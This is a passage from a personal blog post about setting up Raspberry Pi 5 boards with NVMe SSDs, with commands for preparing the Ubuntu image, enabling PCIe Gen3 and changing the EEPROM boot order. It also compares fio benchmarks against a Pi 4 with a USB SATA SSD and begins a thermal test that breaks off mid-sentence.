<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>losetup -f --show -P ubuntu-24.04.2-preinstalled-server-arm64+raspi.img
</span></span><span style="display:flex;"><span>mount /dev/loop0p1 /mnt/raspi_boot/
</span></span><span style="display:flex;"><span>mount /dev/loop0p2 /mnt/raspi_root/
</span></span></code></pre></div><p>Then I enabled the Gen3 support by adding the following lines to <code>/boot/firmware/config.txt</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ini" data-lang="ini"><span style="display:flex;"><span><span style="color:#66d9ef">[pi5]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">dtparam</span><span style="color:#f92672">=</span><span style="color:#e6db74">pciex1</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">dtparam</span><span style="color:#f92672">=</span><span style="color:#e6db74">pciex1_gen=3</span>
</span></span></code></pre></div><p>Unmounting it all works like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>umount /mnt/raspi_boot/ /mnt/raspi_root/
</span></span><span style="display:flex;"><span>losetup -d /dev/loop0
</span></span></code></pre></div><p>And then I wrote it onto a USB stick with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>dd bs<span style="color:#f92672">=</span>4M <span style="color:#66d9ef">if</span><span style="color:#f92672">=</span>ubuntu-24.04.2-preinstalled-server-arm64+raspi.img of<span style="color:#f92672">=</span>/dev/YOUR_USB_STICK_HERE status<span style="color:#f92672">=</span>progress oflag<span style="color:#f92672">=</span>sync
</span></span></code></pre></div><p>The Pi immediately booted up - I saw it soliciting an IP from my DHCP server.
But I wasn&rsquo;t able to SSH in, because while SSH is enabled in the image, password
login is disabled for security reasons.</p>
<p>But I had come prepared. I&rsquo;ve been wanting to get myself a small screen for
debugging boot issues with my Pis for a long time, because I found connecting one
of my main monitors and switching the source around a bit tedious. I ended up
with <a href="https://www.berrybase.de/en/universal-5-0-display-mit-hdmi-vga-eingang-und-resisitivem-touchscreen">this screen</a>.
It&rsquo;s a bit overkill, because it&rsquo;s also a touch screen, but eh. That&rsquo;s how I
could set up the Pi like this:
<figure>
    <img loading="lazy" src="pi-with-screen.jpg"
         alt="Another picture of a Pi 5. The Pi itself looks similar to the other pictures. The important difference here is that it&#39;s sitting on a desk. It is connected to a relatively small TKL keyboard with a wonderful amount of rainbow puke going on. The center piece is a small 5 inch display. It is connected to both, a USB port and a HDMI port on the Pi. Squinting a bit, the text on the screen is legible, showing a terminal session with a download of an SSH public key and copying that key into the user&#39;s authorized_keys file."/> <figcaption>
            <p>A small 5 inch screen for my Pi experiments was a good idea.</p>
        </figcaption>
</figure>

The screen isn&rsquo;t really something to write home about, especially the viewing
angles are atrocious, but it did its job and allowed me to quickly copy my
SSH key and add it to the default user, <code>ubuntu</code>.</p>
<p>That finally done came the moment of truth: Would the NVMe SSD be visible? I was
feeling quite some dread at this moment. Mostly because the first thing I would
have to do for debugging was to try reseating that fiddly PCIe cable. But I
got lucky:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@ubuntu:/tmp/disk-mount# lsblk
</span></span><span style="display:flex;"><span>NAME    MAJ:MIN RM   SIZE RO TYPE MOUNTPOINTS
</span></span><span style="display:flex;"><span>loop0     7:0    <span style="color:#ae81ff">0</span>  38.7M  <span style="color:#ae81ff">1</span> loop /snap/snapd/23546
</span></span><span style="display:flex;"><span>loop1     7:1    <span style="color:#ae81ff">0</span>  38.7M  <span style="color:#ae81ff">1</span> loop /snap/snapd/23772
</span></span><span style="display:flex;"><span>sda       8:0    <span style="color:#ae81ff">1</span>  57.3G  <span style="color:#ae81ff">0</span> disk
</span></span><span style="display:flex;"><span>├─sda1    8:1    <span style="color:#ae81ff">1</span>   512M  <span style="color:#ae81ff">0</span> part /boot/firmware
</span></span><span style="display:flex;"><span>└─sda2    8:2    <span style="color:#ae81ff">1</span>  56.8G  <span style="color:#ae81ff">0</span> part /
</span></span><span style="display:flex;"><span>nvme0n1 259:0    <span style="color:#ae81ff">0</span> 931.5G  <span style="color:#ae81ff">0</span> disk /tmp/disk-mount
</span></span></code></pre></div><p>The NVMe SSD was recognized! &#x1f389;</p>
<p>Next question: Was the Gen3 option working? First, I looked at the <code>dmesg</code> output
and found these encouraging lines:</p>
<pre tabindex="0"><code>[    2.123345] brcm-pcie 1000110000.pcie: Forcing gen 3
[    2.382834] pci 0000:01:00.0: 7.876 Gb/s available PCIe bandwidth, limited by 8.0 GT/s PCIe x1 link at 0000:00:00.0 (capable of 31.504 Gb/s with 8.0 GT/s PCIe x4 link)
</code></pre><p>I went one step further and also checked <code>lspci</code>, because that could have also
been some other PCIe Gen 3 link:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>lspci -vv
</span></span><span style="display:flex;"><span>0000:01:00.0 Non-Volatile memory controller: KIOXIA Corporation NVMe SSD <span style="color:#f92672">(</span>rev 01<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>prog-if <span style="color:#ae81ff">02</span> <span style="color:#f92672">[</span>NVM Express<span style="color:#f92672">])</span>
</span></span><span style="display:flex;"><span>	Subsystem: KIOXIA Corporation NVMe SSD
</span></span><span style="display:flex;"><span>	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
</span></span><span style="display:flex;"><span>	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL<span style="color:#f92672">=</span>fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx-
</span></span><span style="display:flex;"><span>	Latency: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Interrupt: pin A routed to IRQ <span style="color:#ae81ff">42</span>
</span></span><span style="display:flex;"><span>	Region 0: Memory at 1b00000000 <span style="color:#f92672">(</span>64-bit, non-prefetchable<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>size<span style="color:#f92672">=</span>16K<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>80<span style="color:#f92672">]</span> Express <span style="color:#f92672">(</span>v2<span style="color:#f92672">)</span> Endpoint, MSI <span style="color:#ae81ff">00</span>
</span></span><span style="display:flex;"><span>		DevCap:	MaxPayload <span style="color:#ae81ff">256</span> bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited
</span></span><span style="display:flex;"><span>			ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset+ SlotPowerLimit 0W
</span></span><span style="display:flex;"><span>		DevCtl:	CorrErr+ NonFatalErr+ FatalErr+ UnsupReq+
</span></span><span style="display:flex;"><span>			RlxdOrd+ ExtTag+ PhantFunc- AuxPwr- NoSnoop+ FLReset-
</span></span><span style="display:flex;"><span>			MaxPayload <span style="color:#ae81ff">256</span> bytes, MaxReadReq <span style="color:#ae81ff">512</span> bytes
</span></span><span style="display:flex;"><span>		DevSta:	CorrErr- NonFatalErr- FatalErr- UnsupReq- AuxPwr- TransPend-
</span></span><span style="display:flex;"><span>		LnkCap:	Port <span style="color:#75715e">#0, Speed 8GT/s, Width x4, ASPM L1, Exit Latency L1 &lt;64us</span>
</span></span><span style="display:flex;"><span>			ClockPM- Surprise- LLActRep- BwNot- ASPMOptComp+
</span></span><span style="display:flex;"><span>		LnkCtl:	ASPM Disabled; RCB <span style="color:#ae81ff">64</span> bytes, Disabled- CommClk+
</span></span><span style="display:flex;"><span>			ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
</span></span><span style="display:flex;"><span>		LnkSta:	Speed 8GT/s, Width x1 <span style="color:#f92672">(</span>downgraded<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>			TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt-
</span></span><span style="display:flex;"><span>		DevCap2: Completion Timeout: Range ABCD, TimeoutDis+ NROPrPrP- LTR+
</span></span><span style="display:flex;"><span>			 10BitTagComp- 10BitTagReq- OBFF Not Supported, ExtFmt+ EETLPPrefix-
</span></span><span style="display:flex;"><span>			 EmergencyPowerReduction Not Supported, EmergencyPowerReductionInit-
</span></span><span style="display:flex;"><span>			 FRS- TPHComp- ExtTPHComp-
</span></span><span style="display:flex;"><span>			 AtomicOpsCap: 32bit- 64bit- 128bitCAS-
</span></span><span style="display:flex;"><span>		DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LTR+ 10BitTagReq- OBFF Disabled,
</span></span><span style="display:flex;"><span>			 AtomicOpsCtl: ReqEn-
</span></span><span style="display:flex;"><span>		LnkCap2: Supported Link Speeds: 2.5-8GT/s, Crosslink- Retimer- 2Retimers- DRS-
</span></span><span style="display:flex;"><span>		LnkCtl2: Target Link Speed: 8GT/s, EnterCompliance- SpeedDis-
</span></span><span style="display:flex;"><span>			 Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS-
</span></span><span style="display:flex;"><span>			 Compliance Preset/De-emphasis: -6dB de-emphasis, 0dB preshoot
</span></span><span style="display:flex;"><span>		LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete+ EqualizationPhase1+
</span></span><span style="display:flex;"><span>			 EqualizationPhase2+ EqualizationPhase3+ LinkEqualizationRequest-
</span></span><span style="display:flex;"><span>			 Retimer- 2Retimers- CrosslinkRes: unsupported
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>d0<span style="color:#f92672">]</span> MSI-X: Enable+ Count<span style="color:#f92672">=</span><span style="color:#ae81ff">9</span> Masked-
</span></span><span style="display:flex;"><span>		Vector table: BAR<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> offset<span style="color:#f92672">=</span><span style="color:#ae81ff">00002000</span>
</span></span><span style="display:flex;"><span>		PBA: BAR<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> offset<span style="color:#f92672">=</span><span style="color:#ae81ff">00003000</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>e0<span style="color:#f92672">]</span> MSI: Enable- Count<span style="color:#f92672">=</span>1/8 Maskable- 64bit+
</span></span><span style="display:flex;"><span>		Address: <span style="color:#ae81ff">0000000000000000</span>  Data: <span style="color:#ae81ff">0000</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>f8<span style="color:#f92672">]</span> Power Management version <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>		Flags: PMEClk- DSI- D1- D2- AuxCurrent<span style="color:#f92672">=</span>0mA PME<span style="color:#f92672">(</span>D0-,D1-,D2-,D3hot-,D3cold-<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		Status: D0 NoSoftRst+ PME-Enable- DSel<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> DScale<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> PME-
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">100</span> v1<span style="color:#f92672">]</span> Latency Tolerance Reporting
</span></span><span style="display:flex;"><span>		Max snoop latency: 0ns
</span></span><span style="display:flex;"><span>		Max no snoop latency: 0ns
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">110</span> v1<span style="color:#f92672">]</span> L1 PM Substates
</span></span><span style="display:flex;"><span>		L1SubCap: PCI-PM_L1.2+ PCI-PM_L1.1+ ASPM_L1.2+ ASPM_L1.1+ L1_PM_Substates+
</span></span><span style="display:flex;"><span>			  PortCommonModeRestoreTime<span style="color:#f92672">=</span>10us PortTPowerOnTime<span style="color:#f92672">=</span>60us
</span></span><span style="display:flex;"><span>		L1SubCtl1: PCI-PM_L1.2- PCI-PM_L1.1- ASPM_L1.2- ASPM_L1.1-
</span></span><span style="display:flex;"><span>			   T_CommonMode<span style="color:#f92672">=</span>0us LTR1.2_Threshold<span style="color:#f92672">=</span>76800ns
</span></span><span style="display:flex;"><span>		L1SubCtl2: T_PwrOn<span style="color:#f92672">=</span>60us
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">128</span> v1<span style="color:#f92672">]</span> Alternative Routing-ID Interpretation <span style="color:#f92672">(</span>ARI<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		ARICap:	MFVC- ACS-, Next Function: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>		ARICtl:	MFVC- ACS-, Function Group: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">200</span> v2<span style="color:#f92672">]</span> Advanced Error Reporting
</span></span><span style="display:flex;"><span>		UESta:	DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		UEMsk:	DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		UESvrt:	DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP+ ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		CESta:	RxErr- BadTLP- BadDLLP- Rollover- Timeout- AdvNonFatalErr-
</span></span><span style="display:flex;"><span>		CEMsk:	RxErr- BadTLP- BadDLLP- Rollover- Timeout- AdvNonFatalErr+
</span></span><span style="display:flex;"><span>		AERCap:	First Error Pointer: 00, ECRCGenCap- ECRCGenEn- ECRCChkCap+ ECRCChkEn-
</span></span><span style="display:flex;"><span>			MultHdrRecCap- MultHdrRecEn- TLPPfxPres- HdrLogCap-
</span></span><span style="display:flex;"><span>		HeaderLog: <span style="color:#ae81ff">00000001</span> 0000070f 0000001c 185194a3
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">300</span> v1<span style="color:#f92672">]</span> Secondary PCI Express
</span></span><span style="display:flex;"><span>		LnkCtl3: LnkEquIntrruptEn- PerformEqu-
</span></span><span style="display:flex;"><span>		LaneErrStat: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Kernel driver in use: nvme
</span></span><span style="display:flex;"><span>	Kernel modules: nvme
</span></span></code></pre></div><p>Okay, that&rsquo;s a lot. But it did show the expected value for the NVMe SSD, in particular
this line:</p>
<pre tabindex="0"><code>LnkSta:	Speed 8GT/s, Width x1 (downgraded)
</code></pre><p>So yay, PCIe Gen3 was working. And I got that same result on all four Pis. I
know I&rsquo;m repeating myself, but at that point I was so happy that I wouldn&rsquo;t need
to reseat that PCIe cable.</p>
<p>Next step was to have a look at the boot order. I thought I would need to
explicitly add the NVMe disk, but it turns out that the factory firmware already
had it in the boot order. I still went in and changed it, because by default the
NVMe was tried before USB boot. And I like it to be the other way around, so
that I could attach a USB stick if I bork the NVMe install in the future
and have it boot off of that first.</p>
<p>The bootloader on Pi sits in an EEPROM chip on the board, and it can be changed
with the <code>rpi-eeprom-config --edit</code> command. It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@ubuntu:~# rpi-eeprom-config --edit
</span></span><span style="display:flex;"><span>Updating bootloader EEPROM
</span></span><span style="display:flex;"><span> image: /lib/firmware/raspberrypi/bootloader-2712/default/pieeprom-2023-12-06.bin
</span></span><span style="display:flex;"><span>config_src: blconfig device
</span></span><span style="display:flex;"><span>config: /tmp/tmplbyfxh81/boot.conf
</span></span><span style="display:flex;"><span><span style="color:#75715e">################################################################################</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>all<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>BOOT_UART<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>POWER_OFF_ON_HALT<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>BOOT_ORDER<span style="color:#f92672">=</span>0xf641
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">################################################################################</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>*** To cancel this update run <span style="color:#e6db74">&#39;sudo rpi-eeprom-update -r&#39;</span> ***
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>*** CREATED UPDATE /tmp/tmplbyfxh81/pieeprom.upd  ***
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>   WARNING: Installing an older bootloader version.
</span></span><span style="display:flex;"><span>            Update the rpi-eeprom package to fetch the latest bootloader images.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>   CURRENT: Mon Sep <span style="color:#ae81ff">23</span> 13:02:56 UTC <span style="color:#ae81ff">2024</span> <span style="color:#f92672">(</span>1727096576<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    UPDATE: Wed Dec  <span style="color:#ae81ff">6</span> 18:29:25 UTC <span style="color:#ae81ff">2023</span> <span style="color:#f92672">(</span>1701887365<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    BOOTFS: /boot/firmware
</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;/tmp/tmp.joXPbvsUuq&#39;</span> -&gt; <span style="color:#e6db74">&#39;/boot/firmware/pieeprom.upd&#39;</span>
</span></span><span style="display:flex;"><span>Copying recovery.bin to /boot/firmware <span style="color:#66d9ef">for</span> EEPROM update
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>EEPROM updates pending. Please reboot to apply the update.
</span></span><span style="display:flex;"><span>To cancel a pending update run <span style="color:#e6db74">&#34;sudo rpi-eeprom-update -r&#34;</span>.
</span></span></code></pre></div><p>The problem I ran into here was this line:</p>
<pre tabindex="0"><code>WARNING: Installing an older bootloader version.
         Update the rpi-eeprom package to fetch the latest bootloader images.

CURRENT: Mon Sep 23 13:02:56 UTC 2024 (1727096576)
 UPDATE: Wed Dec  6 18:29:25 UTC 2023 (1701887365)
</code></pre><p>The EEPROM version in Ubuntu, even the new Ubuntu 24.04 I was running, was too
old. And there was nothing newer available for the LTS release either. So I
installed <a href="https://launchpad.net/~waveform/+archive/ubuntu/eeprom">this PPA</a>.
After that, I got the same version in the EEPROM update as the factory firmware.</p>
<h3 id="testing-the-pi-5">Testing the Pi 5</h3>
<p>Next up were a couple of performance tests. I was particularly interested in the
IOPS of the NVMe Pi 5 versus the Pi 4 with a USB-attached SATA SSD, because I
think that the stability issues were mostly due to IO, not CPU performance.</p>
<p>I used <a href="https://github.com/axboe/fio">fio</a> to test the performance on the Pi 5
and Pi 4. On both, I used the following invocation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fio --size<span style="color:#f92672">=</span>20M --rw<span style="color:#f92672">=</span>randrw --name<span style="color:#f92672">=</span>IOPS --bs<span style="color:#f92672">=</span>4k --direct<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> --filename<span style="color:#f92672">=</span>/tmp/disk/testfile --numjobs<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span> --ioengine<span style="color:#f92672">=</span>libaio --iodepth<span style="color:#f92672">=</span><span style="color:#ae81ff">32</span> --refill_buffers --group_reporting --runtime<span style="color:#f92672">=</span><span style="color:#ae81ff">60</span> --time_based
</span></span></code></pre></div><p>So I did random read/write, with a block size of 4k, using direct IO, meaning
ignoring all FS caches, running for 60 second using the libaio engine. I also
ran four processes in parallel, as I figure that there would be more than one
writer with the machines serving as control plane nodes.</p>
<p>The full results for the Pi 5 look like this:</p>
<pre tabindex="0"><code>IOPS: (groupid=0, jobs=4): err= 0: pid=5241: Mon Apr 21 14:24:29 2025
  read: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec)
    slat (usec): min=2, max=3070, avg= 5.50, stdev= 6.14
    clat (usec): min=53, max=5266, avg=503.04, stdev=121.10
     lat (usec): min=58, max=5269, avg=508.54, stdev=121.22
    clat percentiles (usec):
     |  1.00th=[  302],  5.00th=[  347], 10.00th=[  371], 20.00th=[  408],
     | 30.00th=[  433], 40.00th=[  461], 50.00th=[  490], 60.00th=[  519],
     | 70.00th=[  553], 80.00th=[  594], 90.00th=[  652], 95.00th=[  701],
     | 99.00th=[  816], 99.50th=[  881], 99.90th=[ 1139], 99.95th=[ 1582],
     | 99.99th=[ 2999]
   bw (  KiB/s): min=582384, max=624383, per=100.00%, avg=604312.95, stdev=1736.39, samples=476
   iops        : min=145596, max=156095, avg=151077.84, stdev=434.11, samples=476
  write: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec); 0 zone resets
    slat (usec): min=3, max=3058, avg= 6.69, stdev= 7.72
    clat (usec): min=21, max=5212, avg=330.48, stdev=86.79
     lat (usec): min=28, max=5216, avg=337.17, stdev=87.20
    clat percentiles (usec):
     |  1.00th=[  208],  5.00th=[  245], 10.00th=[  262], 20.00th=[  281],
     | 30.00th=[  293], 40.00th=[  306], 50.00th=[  318], 60.00th=[  330],
     | 70.00th=[  343], 80.00th=[  367], 90.00th=[  420], 95.00th=[  474],
     | 99.00th=[  594], 99.50th=[  660], 99.90th=[  906], 99.95th=[ 1156],
     | 99.99th=[ 2933]
   bw (  KiB/s): min=584860, max=622736, per=100.00%, avg=603963.50, stdev=1777.65, samples=476
   iops        : min=146215, max=155684, avg=150990.54, stdev=444.42, samples=476
  lat (usec)   : 50=0.01%, 100=0.02%, 250=3.28%, 500=71.81%, 750=23.57%
  lat (usec)   : 1000=1.19%
  lat (msec)   : 2=0.10%, 4=0.03%, 10=0.01%
  cpu          : usr=17.90%, sys=49.51%, ctx=9396343, majf=0, minf=62
  IO depths    : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, &gt;=64=0.0%
     submit    : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, &gt;=64=0.0%
     complete  : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, &gt;=64=0.0%
     issued rwts: total=9052812,9047408,0,0 short=0,0,0,0 dropped=0,0,0,0
     latency   : target=0, window=0, percentile=100.00%, depth=32

Run status group 0 (all jobs):
   READ: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
  WRITE: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec

Disk stats (read/write):
  nvme0n1: ios=9025140/9020061, sectors=72201120/72160584, merge=0/12, ticks=4333666/2703156, in_queue=7036831, util=100.00%
</code></pre><p>The bandwidth was 618 MB/s read and write:</p>
<pre tabindex="0"><code> READ: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
WRITE: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
</code></pre><p>This is a respectable result, considering that the max for PCIe Gen3 x1 is around
1 GB/s.
But more important for me are the IOPS. While the kube control plane is writing
at about 5-6 MB/s, even the USB-attached SATA SSDs shouldn&rsquo;t have had a problem
with that. And the IOPS were looking quite good:</p>
<pre tabindex="0"><code>read: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec)
 iops        : min=145596, max=156095, avg=151077.84, stdev=434.11, samples=476
write: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec); 0 zone resets
 iops        : min=146215, max=155684, avg=150990.54, stdev=444.42, samples=476
</code></pre><p>Both read and write reach over 145k IOPS. So let&rsquo;s look at the Pi 4 and its USB-attached
SATA SSD next:</p>
<pre tabindex="0"><code>IOPS: (groupid=0, jobs=4): err= 0: pid=27703: Mon Apr 21 16:33:26 2025
  read: IOPS=9989, BW=39.0MiB/s (40.9MB/s)(2341MiB/60002msec)
    slat (usec): min=14, max=63796, avg=182.32, stdev=1012.51
    clat (usec): min=229, max=160456, avg=5308.50, stdev=8919.53
     lat (usec): min=278, max=160518, avg=5490.82, stdev=9174.55
    clat percentiles (usec):
     |  1.00th=[  1123],  5.00th=[  1598], 10.00th=[  1958], 20.00th=[  2409],
     | 30.00th=[  2704], 40.00th=[  3032], 50.00th=[  3425], 60.00th=[  3884],
     | 70.00th=[  4490], 80.00th=[  5342], 90.00th=[  6915], 95.00th=[  9110],
     | 99.00th=[ 55837], 99.50th=[ 66323], 99.90th=[ 88605], 99.95th=[ 99091],
     | 99.99th=[116917]
   bw (  KiB/s): min= 3542, max=63975, per=99.82%, avg=39884.73, stdev=5709.77, samples=476
   iops        : min=  885, max=15993, avg=9970.55, stdev=1427.44, samples=476
  write: IOPS=10.0k, BW=39.1MiB/s (41.0MB/s)(2346MiB/60002msec); 0 zone resets
    slat (usec): min=15, max=53787, avg=187.38, stdev=1055.71
    clat (usec): min=703, max=184799, avg=7109.60, stdev=10493.22
     lat (usec): min=929, max=184878, avg=7296.98, stdev=10765.19
    clat percentiles (msec):
     |  1.00th=[    3],  5.00th=[    3], 10.00th=[    3], 20.00th=[    4],
     | 30.00th=[    5], 40.00th=[    5], 50.00th=[    5], 60.00th=[    6],
     | 70.00th=[    7], 80.00th=[    8], 90.00th=[    9], 95.00th=[   12],
     | 99.00th=[   65], 99.50th=[   81], 99.90th=[  108], 99.95th=[  117],
     | 99.99th=[  146]
   bw (  KiB/s): min= 3728, max=64184, per=99.79%, avg=39957.87, stdev=5722.84, samples=476
   iops        : min=  932, max=16046, avg=9988.86, stdev=1430.70, samples=476
  lat (usec)   : 250=0.01%, 500=0.01%, 750=0.03%, 1000=0.22%
  lat (msec)   : 2=5.41%, 4=40.14%, 10=48.37%, 20=2.36%, 50=1.65%
  lat (msec)   : 100=1.72%, 250=0.10%
  cpu          : usr=4.22%, sys=39.42%, ctx=342409, majf=0, minf=108
  IO depths    : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, &gt;=64=0.0%
     submit    : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, &gt;=64=0.0%
     complete  : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, &gt;=64=0.0%
     issued rwts: total=599380,600626,0,0 short=0,0,0,0 dropped=0,0,0,0
     latency   : target=0, window=0, percentile=100.00%, depth=32

Run status group 0 (all jobs):
   READ: bw=39.0MiB/s (40.9MB/s), 39.0MiB/s-39.0MiB/s (40.9MB/s-40.9MB/s), io=2341MiB (2455MB), run=60002-60002msec
  WRITE: bw=39.1MiB/s (41.0MB/s), 39.1MiB/s-39.1MiB/s (41.0MB/s-41.0MB/s), io=2346MiB (2460MB), run=60002-60002msec

Disk stats (read/write):
  sda: ios=592523/587906, sectors=4786048/4795680, merge=5733/11554, ticks=1431760/1951190, in_queue=3383201, util=70.66%
</code></pre><p>Well, yeah. The bandwidth doesn&rsquo;t get beyond 41 MB/s in read or write:</p>
<pre tabindex="0"><code> READ: bw=39.0MiB/s (40.9MB/s), 39.0MiB/s-39.0MiB/s (40.9MB/s-40.9MB/s), io=2341MiB (2455MB), run=60002-60002msec
WRITE: bw=39.1MiB/s (41.0MB/s), 39.1MiB/s-39.1MiB/s (41.0MB/s-41.0MB/s), io=2346MiB (2460MB), run=60002-60002msec
</code></pre><p>And the IOPS aren&rsquo;t looking any better:</p>
<pre tabindex="0"><code>  read: IOPS=9989, BW=39.0MiB/s (40.9MB/s)(2341MiB/60002msec)
   iops        : min=  885, max=15993, avg=9970.55, stdev=1427.44, samples=476
  write: IOPS=10.0k, BW=39.1MiB/s (41.0MB/s)(2346MiB/60002msec); 0 zone resets
   iops        : min=  932, max=16046, avg=9988.86, stdev=1430.70, samples=476
</code></pre><p>Again, yeah. Especially the <code>min</code> values are looking really bad - not even 1k IOPS?
And the averages just below 10k aren&rsquo;t exactly awe-inspiring. So the Pi 5 with
NVMe disks gave me an entire order of magnitude more IO - both for bandwidth and
for IOPS.</p>
<p>Next up, some temperature testing. I was worried in this area, because most Pi 5
cases seem to have an active cooler. But I really wanted the passive heat sink
to work. First, I observed that at idle, the Pi 5 already reached about 50 C.
Not a great sign. To put a bit of load on the machine, I started running
<code>stress -c4 -t 600</code> and watched the temps with <code>watch -n 5 cat /sys/class/thermal/thermal_zone0/temp</code>.
I also kept an eye on the CPU frequency to make sure the PI didn&rsquo;t downclock
with <code>watch -n 5 cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_cur_freq</code>.
The good news is that no downclocking happened. But also, at the end of those
10 minutes, the temps were at a toasty 78 C. And it didn&rsquo;t look like the temps
were stable there, and if I had left it running for a bit longer it might have
